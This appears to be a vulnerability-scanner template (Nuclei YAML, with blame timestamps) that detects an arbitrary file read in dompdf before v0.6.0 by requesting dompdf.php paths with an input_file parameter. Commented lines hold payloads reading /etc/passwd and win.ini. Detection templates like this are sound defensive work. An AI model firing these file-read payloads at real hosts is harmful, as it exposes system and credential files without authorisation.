2021-06-10 09:45:21 +00:00
|
|
|
id: arbitrary-file-read-in-dompdf
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Arbitrary file read in dompdf < v0.6.0
|
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
|
|
|
reference: https://www.exploit-db.com/exploits/33004
|
|
|
|
tags: dompdf,lfi
|
|
|
|
|
2021-06-11 09:52:14 +00:00
|
|
|
# - "/dompdf.php?input_file=C:/windows/win.ini"
|
|
|
|
# - "/dompdf.php?input_file=/etc/passwd"
|
|
|
|
|
2021-06-10 09:45:21 +00:00
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-06-11 09:03:43 +00:00
|
|
|
- "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
|
2021-06-11 09:17:02 +00:00
|
|
|
- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
|
|
|
|
- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
|
2021-06-12 11:12:57 +00:00
|
|
|
- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
|
2021-06-10 09:45:21 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2021-06-11 09:03:43 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "application/pdf"
|
|
|
|
- 'filename="dompdf_out.pdf"'
|
|
|
|
part: header
|
2021-06-11 09:17:02 +00:00
|
|
|
condition: and
|
2021-06-10 09:45:21 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|